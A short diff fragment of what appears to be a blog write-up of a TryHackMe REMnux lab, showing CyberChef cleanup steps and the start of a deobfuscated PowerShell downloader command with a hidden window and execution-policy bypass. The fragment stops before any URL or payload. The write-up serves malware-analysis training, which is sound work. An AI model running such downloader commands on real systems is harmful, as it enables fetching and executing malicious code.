DustinMerritt/dustinmerritt.github.io/_posts/2025-07-25-tryhackme-remnuxgettingstarted copy.md

   - Replace `*` with an empty string
   - Replace `^` with an empty string

-> 🔽 **Insert screenshot of CyberChef here showing the Find/Replace steps and the cleaned PowerShell script**

-Once cleaned, the PowerShell command was clearly a downloader:
+Once cleand, the PowerShell command was clearly a downloader:

 ```powershell
 powershell -WindowStyle hidden -executionpolicy bypass;